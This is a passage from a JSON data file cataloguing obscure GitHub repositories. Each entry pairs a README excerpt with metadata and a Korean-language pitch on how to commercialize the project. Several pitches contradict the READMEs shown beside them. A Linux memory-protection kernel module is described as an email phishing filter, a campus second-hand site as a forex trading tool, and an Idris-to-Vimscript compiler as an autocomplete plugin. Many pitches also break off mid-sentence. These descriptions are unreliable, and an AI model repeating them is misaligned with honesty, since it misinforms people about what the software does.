\n5","composite_score":0.3007,"license_safety_tag":"unknown"},{"name":"fossasia/loklak-webtweets","github_url":"https://github.com/fossasia/loklak-webtweets","stars":11,"language":"Less","license":"unknown","abandonment_months":67,"description":"# fossasia/loklak-webtweets 분석\n\n## 왜 보물인가\n트위터 같은 소셜 미디어의 글들을 수집하고 분석할 수 있는 도구로, 마케팅이나 여론 조사가 필요한 기업들이 큰 가치를 느낄 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **소셜 미디어 분석 서비스**: 기업들이 자신의 브랜드에 대한 고객 반응을 실시간으로 추적하고 분석하는 SaaS ","readme_excerpt":"# loklak webtweets\n\nFOSSASIA Tweets with loklak: Implement Webtweets with loklak\n\n**Objective of the mini project**\n\nImplement web tweets with loklak and substitute the implementation with twitter. Improve former implementations and reduce dependencies on additional files in repositories as much as possible. Make use of anonymous loklak API at http://api.loklak.org\n\n**Requirements**\n\n- use loklak API at http://api.loklak.org\n\n**Expected Outcome**\n\n- substitution of twitter implementation with loklak and accepted pull request\n- improvement of implementation e.g. possibility to call API with several hashtags, search term, specific accounts, time limit etc.\n\n**Links**\n\n- loklak API http://api.loklak.org\n- Repository https://github.com/fossasia/loklak-webtweets\n- Sample http://fossasia.github.io/loklak-webtweets/\n\n**Directions**\n- To change the number of tweets being recycled, change the *data-count* attribute in the HTML of the div with class \"tweets-feed\". To change the query, change the","composite_score":0.3007,"license_safety_tag":"unknown"},{"name":"guyecode/qianmu","github_url":"https://github.com/guyecode/qianmu","stars":7,"language":"Python","license":"unknown","abandonment_months":102,"description":"# guyecode/qianmu 저장소 분석\n\n## 왜 보물인가\n저장소 정보가 매우 제한적(Stars 7개, 최근 업데이트 2018년)이어서 현재 상태와 실제 가치를 파악하기 어렵습니다.\n더 이상 활발히 관리되지 않는 프로젝트로 보여 상업화하기에는 리스크가 있습니다.\n\n## 어디에 쓸 수 있나\n**내부 업무 도구**: 팀 내부에서 작은 규모의 자동화 작업이","readme_excerpt":"","composite_score":0.3007,"license_safety_tag":"unknown"},{"name":"xianyulaodi/jianshu_spider","github_url":"https://github.com/xianyulaodi/jianshu_spider","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":103,"description":"# Jianshu Spider 상용화 분석\n\n## 왜 보물인가\n인기 있는 중국 글쓰기 플랫폼에서 글과 사용자 정보를 자동으로 수집할 수 있어, 콘텐츠 분석이나 마케팅 리서치 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **콘텐츠 분석 SaaS**: 중국 온라인 글의 트렌드, 인기 주제, 작성자 정보를 실시간으로 분석하는 구독 서비스\n2.","readme_excerpt":"# jianshu_spider\n\n使用方法： \n1. `npm install`\n\n2. `npm run start`\n\n3. 浏览器打开 localhost:3000","composite_score":0.3007,"license_safety_tag":"unknown"},{"name":"benoror/blockstack-create-react-app","github_url":"https://github.com/benoror/blockstack-create-react-app","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":90,"description":"# benoror/blockstack-create-react-app 분석\n\n## 왜 보물인가\n블록체인 기술을 일반 웹 개발자도 쉽게 사용할 수 있도록 만든 도구로, 분산화된 인터넷 서비스 개발의 진입장벽을 낮춘 것이 핵심 가치입니다.\n\n## 어디에 쓸 수 있나\n1. **개인 데이터 관리 SaaS**: 사용자가 자신의 정보를 직접 통제하는 클라우드 저장소 서","readme_excerpt":"# Blockstack Create React App\n\nA basic starter kit for building Blockstack apps using [Create React App](https://github.com/facebookincubator/create-react-app)\n\n![iso6sffqlx](https://user-images.githubusercontent.com/119117/33392657-50ee023a-d502-11e7-8f2a-6857b146e0fd.gif)\n\n---\n\nThis project was bootstrapped with [Create React App](https://github.com/facebookincubator/create-react-app).\n\nBelow you will find some information on how to perform common tasks.<br>\nYou can find the most recent version of this guide [here](https://github.com/facebookincubator/create-react-app/blob/master/packages/react-scripts/template/README.md).\n\n## Table of Contents\n\n- [Updating to New Releases](#updating-to-new-releases)\n- [Sending Feedback](#sending-feedback)\n- [Folder Structure](#folder-structure)\n- [Available Scripts](#available-scripts)\n  - [npm start](#npm-start)\n  - [npm test](#npm-test)\n  - [npm run build](#npm-run-build)\n  - [npm run eject](#npm-run-eject)\n- [Supported Language Features and Polyf","composite_score":0.3007,"license_safety_tag":"unknown"},{"name":"yacy/yacy_grid_loader","github_url":"https://github.com/yacy/yacy_grid_loader","stars":11,"language":"Java","license":"unknown","abandonment_months":42,"description":"# YaCy Grid Loader 상업화 분석\n\n## 왜 보물인가\n인터넷에서 대량의 정보를 자동으로 수집하고 정리해주는 도구로, 검색 엔진이나 데이터 분석 회사들이 꼭 필요로 하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **웹 데이터 수집 SaaS** - 기업들이 경쟁사 가격, 뉴스, 시장 정보를 자동으로 모아볼 수 있는 구독형 서비스\n2. *","readme_excerpt":"# YaCy Grid Component: Loader\n\nThe YaCy Grid is the second-generation implementation of YaCy, a peer-to-peer search engine.\nA YaCy Grid installation consists of a set of micro-services which communicate with each other\nusing the MCP, see https://github.com/yacy/yacy_grid_mcp\n\n## Purpose\n\nThe Loader is a microservice which can be deployed i.e. using Docker.\nEach search engine needs a file loader and this component will do that work.\nThe special feature of this loader is it's embedded headless browser which makes\nit possible to load rich content and provide that content for a search engine.\n\n## What it does\n\nWhen the Loader component is started, it searches for a MCP and connects to it.\nBy default the local host is searched for a MCP but you can configure one yourself.\n\nThe Loader will then wait for client requests and performs web loading upon request.\nIt also has a MCP queue listener to react on loading requests in the working queues.\nAfter loading of content the loader will push back ","composite_score":0.3007,"license_safety_tag":"unknown"},{"name":"fossasia/2010.fossasia.org","github_url":"https://github.com/fossasia/2010.fossasia.org","stars":11,"language":"HTML","license":"unknown","abandonment_months":72,"description":"# fossasia/2010.fossasia.org 평가\n\n## 왜 보물인가\nFOSS Asia 2010 컨퍼런스의 웹사이트 아카이브로, 오픈소스 커뮤니티의 역사적 자산이자 행사 운영 노하우를 담고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 컨퍼런스 웹사이트 템플릿 제공 서비스 - 비영리 기관이 쉽게 행사 페이지를 구축하도록 지원\n2","readme_excerpt":"FOSSASIA Summit 2010\n============\n\nhttps://2010.fossasia.org\n\n","composite_score":0.3007,"license_safety_tag":"unknown"},{"name":"fossasia/fossasia.github.io","github_url":"https://github.com/fossasia/fossasia.github.io","stars":11,"language":"HTML","license":"unknown","abandonment_months":86,"description":"# fossasia/fossasia.github.io 분석\n\n## 왜 보물인가\nFOSS(자유 오픈소스 소프트웨어) 커뮤니티의 공식 웹사이트로, 전 세계 오픈소스 개발자들을 연결하는 중추적 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 오픈소스 프로젝트 관리 및 협업 플랫폼으로 운영, 개발자 커뮤니티 구독료 수익화\n2. **내부 업무","readme_excerpt":"# fossasia.github.io\n\nPlease visit http://fossasia.org\n","composite_score":0.3007,"license_safety_tag":"unknown"},{"name":"Aetheryx/aethcord-backend","github_url":"https://github.com/Aetheryx/aethcord-backend","stars":6,"language":"TypeScript","license":"OSL-3.0","abandonment_months":49,"description":"# Aetheryx/aethcord-backend 평가\n\n## 왜 보물인가\n디스코드 같은 채팅 플랫폼을 직접 만들 수 있는 백엔드 기술로, 자체 커뮤니티나 협업 앱을 원하는 회사들에게 필수적인 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 게임사나 크리에이터가 팬들과 소통하는 전용 채팅 플랫폼 제공\n2. **내부 업무 도구**: 대","readme_excerpt":"# powercord-backend\nThe backend for [powercord-org/powercord](https://github.com/powercord-org/powercord).\n\n## Repo structure\n - `shared`: Shared resources across backend packages\n - `packages/api`: REST API\n - `packages/web`: Web UI & HTTP server for pre-rendering\n - `packages/boat`: Discord bot for the Powercord server\n - `packages/boat-legacy`: Legacy version of the Discord bot\n - `packages/grid`: Power Grid service, responsible for ingesting plugins and themes, and their distribution\n - `packages/crapcord`: Library for interfacing with the Discord API (soon to be moved away)\n\n## License\nThis software is licensed under the Open Software License version 3.0, with a few exceptions:\n - `packages/crapcord` is licensed under BSD-3-Clause\n - `packages/web/src/components/docs/Markdown.tsx` is courtesy of Borkenware as part of Spoonfeed, licensed under BSD-3-Clause\n - Spookycord logo variant has been designed by Ozzymand and is licensed under [CC-BY-SA 4.0](https://creativecommons.org/licen","composite_score":0.3007,"license_safety_tag":"unknown"},{"name":"Moe-Net/Mathpix","github_url":"https://github.com/Moe-Net/Mathpix","stars":5,"language":"Mathematica","license":"unknown","abandonment_months":78,"description":"# Mathpix 저장소 분석\n\n## 왜 보물인가\n수학 문제나 과학 공식이 담긴 사진을 자동으로 인식해서 디지털 형식으로 변환해주는 기술로, 교육·출판·연구 분야에서 수작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 학생들이 교과서 사진을 찍으면 자동으로 풀이 과정과 답안을 제시하는 AI 과외 앱\n2. **내부 업","readme_excerpt":"# Mathpix\n\nUse paclet manager to install the latest version:\n\n```Mathematica\nResourceFunction[\"GitHubInstall\"][\"GalAster\", \"Mathpix\"]\n```\n\nApply for your API Key from https://dashboard.mathpix.com/signup, with one thousand free credits per month\n\nThen set your key and load the function:\n\n```Mathematica\nPersistentValue[\"Mathpix\", \"Local\"]={\"$KeyName\",\"$KeyValue\"};\n```\n\n## Usage\n\nMathpix receives a `Image`, or the `String` of path to the image, or `MathpixAPI` object.\n\nAnd have the following modes: `{N, D, E, Text, \"Raw\"}`.\n\n## NormalMode\n\n![Normal](https://i.loli.net/2018/12/01/5c0248400385c.png)\n\n## DisplayMode\n\n![Display](https://i.loli.net/2018/12/01/5c0248402b4b5.png)\n\n## ExpressionMode\n\n![Expression](https://i.loli.net/2018/12/01/5c02483fae878.png)\n\n## RawMode\n\n![Raw](https://i.loli.net/2018/12/01/5c024926664f1.png)","composite_score":0.3007,"license_safety_tag":"unknown"},{"name":"JYVSECTEC/PHR-model","github_url":"https://github.com/JYVSECTEC/PHR-model","stars":17,"language":"Jupyter Notebook","license":"unknown","abandonment_months":53,"description":"","readme_excerpt":"Prepare, Hunt, and Respond - Conceptual model against cyber attacks by [JYVSECTEC](https://jyvsectec.fi). Also, try out the [interactive version](https://phr.jyvsectec.fi/phr.html) of the model.\n\n## Overview\nThe idea behind the conceptual model is to represent a comprehensive model for organizations to defend against modern cyber attacks. The model \"PREPARE, HUNT, AND RESPOND\" will be evolving from the initial release to encompass more detailed information and examples of tools and techniques to each section. The goal is to gather the best publicly available information, solutions, and tools to represent how different sections of the model can be done. \n\n![Prepare, Hunt, and Respond - Conceptual model against cyber attacks](https://raw.githubusercontent.com/JYVSECTEC/PHR-model/master/_images/Prepare_Hunt_Respond.png \"Prepare, Hunt, and Respond - Conceptual model against cyber attacks\")\n\n[Download the PDF version](https://github.com/JYVSECTEC/PHR-model/blob/master/Prepare_Hunt_Respond_P","composite_score":0.3007,"license_safety_tag":"unknown"},{"name":"souporserious/unicon","github_url":"https://github.com/souporserious/unicon","stars":14,"language":"JavaScript","license":"unknown","abandonment_months":42,"description":"# souporserious/unicon 분석\n\n## 왜 보물인가\n아이콘(작은 그림 기호)을 쉽게 만들고 관리할 수 있는 도구로, 웹사이트나 앱을 디자인하는 사람들의 시간과 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **디자인 SaaS**: 웹사이트 빌더 플랫폼에서 사용자가 직접 아이콘을 커스터마이징하고 다운로드하게 하는 유료 서비스","readme_excerpt":"# 🦄 unicon\n\nWrangle SVGs from your favorite design tool. Works with Figma, Sketch, and\nanything else that can export svgs.\n\n## ☢️ Warning\n\nAPI may be in flux until an official V1. Please use at your own risk.\n\n## 📦 Packages\n\n### [unicon](/packages/unicon)\n\nA set of functions to source SVG data from _any_ design tool.\n\n### [unicon-transformer-json](/packages/unicon-transformer-json)\n\nClean and transform SVG data into JSON fragments.\n\n### [unicon-cli](/packages/unicon-cli)\n\nSource data and use transformers to create a file of individually exported SVG\ndata fragments.\n\n### [unicon-react](/packages/unicon-react)\n\nUniversal SVG rendering in React.\n\n## 🤠 Examples\n\nCheck out the [examples](/examples) folder for working examples in React and\nReact Native.\n\n## 🙏 Thanks\n\nThis project is built on the shoulders of giants and wouldn't be possible\nwithout an amazing community. Huge thanks to the following people:\n\n- [Brent Jackson](https://twitter.com/jxnblk) for always experimenting with\n  design t","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"owickstrom/idris-vimscript","github_url":"https://github.com/owickstrom/idris-vimscript","stars":20,"language":"Haskell","license":"NOASSERTION","abandonment_months":101,"description":"# idris-vimscript 프로젝트 분석\n\n## 왜 보물인가\n텍스트 편집기(Vim)에서 프로그래밍 언어를 자동으로 완성해주는 매우 틈새적이고 기술적으로 어려운 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n1. **프로그래머용 Vim 플러그인 SaaS**: 자동 완성 기능을 구독형으로 제공하는 온라인 서비스\n2. **기업 개발팀 내부 도구**: 대규모 소","readme_excerpt":"# Idris Vimscript!\n\n[![](https://img.shields.io/github/issues/badges/shields/good%20first%20issue.svg?colorB=05c62c)](https://github.com/owickstrom/idris-vimscript/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22)\n\nThe good stuff.\n\n**Please note that this is *very* experimental. For example, the Idris\n`Integer` type, usually represented as an arbitrary-precision integer, is\nrepresented using the Vim number type.**\n\n**It's a hack, deal with it. &#x1f60e;**\n\nOr, better still:\n\n## Contribute!\n\nThis is a fun project, and the authors aren't expert compiler writers: we need\nyour help! There are three languages (Idris, Haskell, and documentation!) you\ncan contribute in, and knowledge of Vimscript is useful too.  Specifically:\n\n* if you know a little Idris, you can add bindings for more of the Vim API\n* if you know some Haskell, you can add new or improve existing optimisations,\n  make the generated code better, or improve performance\n* if you can do Vimscript, we'd like you to hel","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"CalebWhiting/java-asm-obfuscator","github_url":"https://github.com/CalebWhiting/java-asm-obfuscator","stars":6,"language":"Java","license":"WTFPL","abandonment_months":50,"description":"# CalebWhiting/java-asm-obfuscator 분석\n\n## 왜 보물인가\n프로그래머가 작성한 코드를 읽기 어렵게 만들어 소프트웨어 불법 복제나 해킹을 방지하는 보안 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **금융 소프트웨어 판매 기업**: 은행이나 증권사의 거래 시스템을 판매할 때 코드 유출 방지용\n2. **게임 개발사의 안티치트 솔루션","readme_excerpt":"# java-asm-obfuscator (jasmo)\nObfuscates compiled java code to make it harder to reverse engineer.\n\n```text\nusage: java -jar jasmo.jar <src> <dest> [-c <arg>] [-h] [-k <arg>] [-p <arg>] [-v]\n -c,--cfn <arg>       Enable 'crazy fucking names' and set name length (large names == large output size)\n -h,--help            Print help message\n -k,--keep <arg>      Don't rename this class\n -p,--package <arg>   Move obfuscated classes to this package\n -v,--verbose         Increase verbosity\n```\n \nCurrent Obfuscators:\n-\n\n<dl>\n    <dt>Shuffle Members<br></dt>\n    <dd>Shuffles the order of classes, methods, fields, annotations, interfaces, exceptions etc</dd>\n    <dt>Inline Accessors<br></dt>\n    <dd>Removes get/set methods, replacing them with direct field access</dd>\n    <dt>Remove Debug Information</dt>\n    <dd>Removes debugging information left by the compiler such as variable names and line numbers</dd>\n    <dt>Scramble Classes</dt>\n    <dd>Renames classes, optionally skipping classes provide","composite_score":0.3006,"license_safety_tag":"safe"},{"name":"vegather/GraphView","github_url":"https://github.com/vegather/GraphView","stars":8,"language":"Swift","license":"mit","abandonment_months":106,"description":"# GraphView 상품화 분석\n\n## 왜 보물인가\n복잡한 데이터 관계를 시각적으로 표현하는 기술로, 의사결정이 필요한 모든 비즈니스에서 데이터를 더 쉽게 이해할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업 데이터 분석 플랫폼에 그래프 시각화 기능을 추가하여 고객사의 매출, 고객, 제품 간 연결 관계를 한눈에 보여주기","readme_excerpt":"# Graph View\n\n## Description\nGraphView is a very simple graph library for both iOS and OS X that lets you very easily plot a graph from real-time data. We use it internally at MOON Wearables to plot real-time data from different sensors. Below you can see a screenshot and some GIFs of the graph view plotting sample data generated by compound sine waves. There's example code for both OS X and iOS in their respective folders.\n\n![Image](http://imgur.com/P8pfcP8.png)\n\n![Image](http://imgur.com/aBwsPs5.gif)\n\n## API\n### Overview\nThe entire library is just one class called `GraphView`. It has a range of properties that can be used to customize the graph, and a few methods to add and remove data. The graph automatically scales based on the values you've passed into it. Although you can force it to not scale by setting `isAutoscaling = false` and `visibleRange = 3...5`, or whatever range you want. On iOS, you can also pinch and pan on the graph to move around. If you don't want this behavior (l","composite_score":0.3006,"license_safety_tag":"safe"},{"name":"fossasia/dev.susi.ai","github_url":"https://github.com/fossasia/dev.susi.ai","stars":12,"language":"","license":"unknown","abandonment_months":97,"description":"# SUSI.AI 개발 저장소 평가\n\n## 왜 보물인가\nSUSI는 누구나 사용할 수 있는 인공지능 챗봇 플랫폼으로, 기술이 없는 사람도 자신만의 똑똑한 AI 어시스턴트를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업의 고객지원팀을 위한 자동응답 챗봇 플랫폼으로 월 구독료 받기\n2. **내부 업무 도구**: 회사 직원들의","readme_excerpt":"DEV.SUSI.AI\n\nThis repository brings together the documentation for all SUSI.AI projects at https://dev.susi.ai.\n\nSusi AI is an intelligent Open Source personal assistant. It is capable of chat and voice interaction by using APIs to perform actions such as music playback, making to-do lists, setting alarms, streaming podcasts, playing audiobooks, and providing weather, traffic, and other real time information. Additional functionalities can be added as console services using external APIs. Susi AI is able to answer questions and depending on the context will ask for additional information in order to perform the desired outcome. The core of the assistant is the Susi AI server that holds the \"intelligence\" and \"personality\" of Susi AI. The Android and Web applications make use of the APIs to access information from a hosted server.\n","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"tomlockwood/dn","github_url":"https://github.com/tomlockwood/dn","stars":5,"language":"","license":"unknown","abandonment_months":78,"description":"# tomlockwood/dn 프로젝트 분석\n\n## 왜 보물인가\n저장소 설명과 문서가 없어 정확한 기능을 파악하기 어렵지만, 작은 규모의 활성 프로젝트로 보아 특정 문제를 간결하게 해결하는 도구일 가능성이 있습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 팀이 일상적으로 사용하는 자동화 스크립트나 데이터 처리 도구로 판매\n- **API 판매","readme_excerpt":"# dn - Daily notes command line tool\n\n`dn` is a simple command line tool to help keep notes on what you did every day and what's coming up.\n\n# Usage\n\n`dn` writes a bullet-pointed string to a file with today's date in YYYY-MM-DD format in the `~/dn/` folder.\n\n`dno` does the same, but the first argument is the filename.  This can be used for future notes i.e. `dno 2030-10-01 \"I died\"`.\n\n`dnt` displays today's notes.\n\n`dnv` displays all files, or when an argument like `2019-10` is passed, `~/dn/2019-10*`.\n\n`dnte` edit today's notes in vim.\n\n`dnoe` edit a note in vim for a given date. i.e. `dnoe 2019-11-02`. If no date is passed i.e. `dnoe` then a file selection prompt appears in vim.\n\n# Example\n\n```\n$ dn \"The same thing we do every night\"\n\n$ dnv\n2019-11-01\n * Made dn\n2019-11-02\n * The same thing we do every night\n\n\n$ dnv 2019-11-02\n2019-11-02\n * The same thing we do every night\n\n$ dnt\n2019-11-02\n * The same thing we do every night\n\n$ dno 1977-10-28 \"Saw star wars\"\n\n$ dnv\n1977-10-28\n * Saw","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"pjreddie/cnn-primer","github_url":"https://github.com/pjreddie/cnn-primer","stars":11,"language":"C","license":"unknown","abandonment_months":103,"description":"# pjreddie/cnn-primer 분석 보고서\n\n## 왜 보물인가\n사진이나 이미지를 컴퓨터가 이해하고 분석하도록 가르치는 기초 교육 자료로, AI 개발자들의 학습 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사진 분류 및 객체 인식 API를 제공하는 온라인 도구 (예: 제품 사진 자동 분류)\n2. **내부 업무 도구**: 회사","readme_excerpt":"","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"randomcorp/thread-first-thread-last-backwards-question-mark-as-arrow-cond-arrow-bang","github_url":"https://github.com/randomcorp/thread-first-thread-last-backwards-question-mark-as-arrow-cond-arrow-bang","stars":24,"language":"Clojure","license":"unknown","abandonment_months":75,"description":"# randomcorp/thread-first-thread-last-backwards-question-mark-as-arrow-cond-arrow-bang 분석\n\n## 왜 보물인가\n프로그래밍 언어의 문법을 더 간단하고 읽기 쉽게 만드는 도구로, 복잡한 코드 작성을 효율적으로 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 코","readme_excerpt":"# ->->><?as->cond->!\n\n_As seen in [Every Clojure Talk Ever](https://www.youtube.com/watch?v=jlPaby7suOc) by [Amperity](https://github.com/amperity)_\n\nThis is the bread and butter of randomcorp's Clojure code and we're\nexcited to share it with the world. Have you been frustrated with\nalways needing to compose the various types of threading macros?\n\n```clojure\n(-> []\n    (conj 1 2 3)\n    (->> (mapv inc))\n    (as-> v\n      {:vec-of-numbers v})\n    (cond->\n      (some-pred) (assoc :other-key \"other-val\")))\n```\n\nIt would be nice if there were one single macro to do all that for\nyou. Well, now there is!\n\n```clojure\n(->->><?as->cond->!\n  []\n  :-> (conj 1 2 3)\n  :->> (mapv inc)\n  :as-> v {:vec-of-numbers v}\n  :cond-> (some-pred) (assoc :other-key \"other-val\"))\n```\n\nTo short-circuit on nil values (a la `some->`), use `:<?`:\n\n```clojure\n(->->><?as->cond->!\n  []\n  :-> not-empty\n  :<?\n  :-> (conj 1))\n\n;; => nil\n```\n\nTo make assertions about the values during the threading, use `:!`:\n\n```clojure\n(-","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"fossasia/fossasia.net","github_url":"https://github.com/fossasia/fossasia.net","stars":11,"language":"HTML","license":"unknown","abandonment_months":77,"description":"# FOSSASIA 웹사이트 저장소 분석\n\n## 왜 보물인가\n오픈소스 커뮤니티의 공식 웹사이트 운영 경험과 기술 스택을 그대로 활용할 수 있는 참고 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **커뮤니티 관리 SaaS**: 오픈소스 프로젝트나 개발자 커뮤니티를 위한 웹사이트 구축 플랫폼\n2. **비영리 단체 웹사이트 템플릿**: 기술 커뮤니티, 학생 동아","readme_excerpt":"FOSSASIA.net\n\nJoin us: http://fossasia.net\n","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"fossasia/jobs.fossasia.org","github_url":"https://github.com/fossasia/jobs.fossasia.org","stars":12,"language":"HTML","license":"unknown","abandonment_months":93,"description":"# fossasia/jobs.fossasia.org 분석\n\n## 왜 보물인가\n오픈소스 커뮤니티 내에서 개발자 채용 시스템을 자동화할 수 있는 기반 기술이 담겨 있습니다.\n\n## 어디에 쓸 수 있나\n1. **채용 관리 SaaS**: 중소 IT회사들이 구직자 정보와 채용 공고를 한 곳에서 관리하는 웹 서비스\n2. **스타트업 채용 플랫폼**: 신입 개발자 채용","readme_excerpt":"Site for FOSSASIA Jobs Sites - jobs.fossasia.org\n\nhttp://blog.fossasia.org/jobs/\n","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"yy1193889747/fxhand","github_url":"https://github.com/yy1193889747/fxhand","stars":8,"language":"JavaScript","license":"unknown","abandonment_months":101,"description":"# fxhand 저장소 분석\n\n## 왜 보물인가\n외환(환율) 거래 자동화 도구로, 복잡한 환율 계산과 거래를 프로그래밍으로 자동 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **환율 자동 모니터링 서비스**: 사용자가 원하는 환율에 도달하면 알림을 보내주는 구독형 앱\n2. **수입업체 내부 도구**: 해외 발주 시 환율 변동을 자동 추적하고 최적 ","readme_excerpt":"# 基于SSH的校园二手网站开发\n* 前言\n\n     之前学校做的课程设计，现在整理个readme出来。\n* 系统功能\n    * 游客浏览用户已发布商品的信息\n    * 游客注册为用户及用户的登录\n    * 用户发布欲出售商品\n    * 用户个人中心，管理发布的商品\n    * 用户删除收藏，用户认证\n    * 系统管理员，进行数据的增删改查，导出功能\n* 技术要点\n    * 下拉框二级联动\n    * 手机短信验证\n    * 滑动验证码\n    * 分页技术\n    \n![](/WebRoot/images/index.png \"主页显示\")    \n![](/WebRoot/images/login.png \"模态框登录注册\")","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"fossasia/knitpat","github_url":"https://github.com/fossasia/knitpat","stars":11,"language":"Python","license":"unknown","abandonment_months":68,"description":"# KnitPat 저장소 분석\n\n## 왜 보물인가\n니팅(뜨개질) 패턴을 디지털로 설계하고 공유할 수 있는 오픈소스 도구로, 수공예 시장과 디지털 기술을 연결하는 틈새 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n1. **뜨개질 플랫폼 SaaS**: 아마추어와 전문가 뜨개질 작가들이 패턴을 설계·판매하는 온라인 마켓플레이스\n2. **텍스타일 기업 내부 도구**","readme_excerpt":"# knitpat\nKnitting Pattern Format\n","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"TheTorProject/ooni-probe","github_url":"https://github.com/TheTorProject/ooni-probe","stars":7,"language":"Python","license":"NOASSERTION","abandonment_months":42,"description":"# OONI Probe 저장소 분석\n\n## 왜 보물인가\n인터넷 검열과 차단 상황을 전 세계에서 측정하고 기록하는 투명한 모니터링 도구로, 언론의 자유와 정보 접근 문제를 데이터로 증명할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 언론사, 인권단체, NGO를 위한 \"인터넷 검열 모니터링 대시보드\" 구독 서비스 (월별 국가별 검열","readme_excerpt":"⚠️⚠️⚠️⚠️: this repository contains the source code of the legacy\nimplementation of ooniprobe. Please, check out instead:\n\n1. https://github.com/ooni/probe, the meta-repository where you should\nbe opening issues and feature requests;\n\n2. https://github.com/ooni/probe-cli, which contains the new implementation\nof ooniprobe as a command line client written in Go;\n\n3. https://github.com/ooni/probe-desktop, which contains the ooniprobe\ndesktop applicaton, written in JavaScript and Electron.\n\nThank you for your interest in OONI!\n\nThe remainder of this file contains the original README.rst for\nthe legacy implementation:\n\n------------\n\nooniprobe: a network interference detection tool\n================================================\n\n.. image:: https://travis-ci.org/TheTorProject/ooni-probe.png?branch=master\n    :target: https://travis-ci.org/TheTorProject/ooni-probe\n\n.. image:: https://coveralls.io/repos/TheTorProject/ooni-probe/badge.png\n    :target: https://coveralls.io/r/TheTorProject/ooni-","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"OmniSharp/atom-json-schema","github_url":"https://github.com/OmniSharp/atom-json-schema","stars":6,"language":"TypeScript","license":"mit","abandonment_months":111,"description":"# OmniSharp/atom-json-schema 분석\n\n## 왜 보물인가\n프로그래밍 작업 시 실수를 줄이고 효율성을 높여주는 보조 도구로, 개발자들이 자주 사용하는 에디터와 통합되어 실질적인 생산성 향상을 제공합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개발자 도구 플랫폼에서 정식 기능으로 통합하여 월 구독료 수익화\n- **내부 업무","readme_excerpt":"# Json Schema\n\nAdds support for [JSON Schema](http://json-schema.org/) in [Atom](http://atom.io).\n\n![](https://raw.githubusercontent.com/OmniSharp/atom-json-schema/master/schema.gif)\n\n\n![](https://raw.githubusercontent.com/OmniSharp/atom-json-schema/master/schema2.gif)\n\n## Whats it do\nUsing is-my-json-valid for schema validation, Json Schema warns the user if their json file doesn't match the commonly defined schema.  Also using the defined Json Schema we can offer auto completion results for enum values.\n\n## Extentions\nJson Schema was built for use with [OmniSharp](http://www.omnisharp.net/).  There is an extension point that lets you plug in custom intellisense providers.  This is to help with tools like Npm or NuGet, where package.json and project.json\nboth have their package references.  This this extension point you can plug in calls off to the associated webservice / localcache / whatever you want.\n\n## Npm support\nAs stated above, NPM support is added out of the box.  Search is l","composite_score":0.3006,"license_safety_tag":"safe"},{"name":"perceptionpoint/suprotect","github_url":"https://github.com/perceptionpoint/suprotect","stars":6,"language":"C","license":"unknown","abandonment_months":91,"description":"# perceptionpoint/suprotect 분석\n\n## 왜 보물인가\n이메일과 메신저 같은 업무 소통 도구에서 악성 링크나 사기 메시지를 자동으로 탐지하고 차단하는 보안 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 이메일 보안 솔루션으로 구독 서비스화하여 월정액 제공\n2. **내부 업무 도구**: 회사의 구글 워크스페이","readme_excerpt":"# suprotect\nA Proof-Of-Concept Linux kernel module for changing memory protection in an arbitrary process (x64 only).\n\n## Instructions\nTo compile the kernel module and the user-mode utility, run `make`. To clean the project directory, run `make clean`.\n\nTo load the kernel module, run `sudo insmod suprotect.ko`. To unload the kernel module, run `sudo rmmod suprotect.ko`.\n\nTo change memory protection, run the uesr-mode utility `suprotect-cli` with this usage (while the kernel module is loaded, of course):\n```\nUsage: ./suprotect-cli <pid> <addr> <len> <prot>\nNote: all the parameters are in hex, except the pid.\n```\n\n## Example\nLet's run python with an infinite loop:\n```\nron@ron-ubuntu:~/suprotect$ python -c \"while True: pass\" &\n[1] 4504\n```\n\nFirst, check its memory mapping:\n```\nron@ron-ubuntu:~/suprotect$ sudo cat /proc/4504/maps\n56143b00d000-56143b315000 r-xp 00000000 08:01 1579941                    /usr/bin/python2.7\n56143b515000-56143b517000 r--p 00308000 08:01 1579941                 ","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"yacy/yacy_search_androidclient","github_url":"https://github.com/yacy/yacy_search_androidclient","stars":10,"language":"Java","license":"unknown","abandonment_months":117,"description":"# YaCy Search Android Client 분석\n\n## 왜 보물인가\n구글이나 네이버 같은 큰 검색 회사에 의존하지 않고 독립적으로 검색할 수 있는 안드로이드 앱으로, 개인 정보 보호를 중시하는 사용자들에게 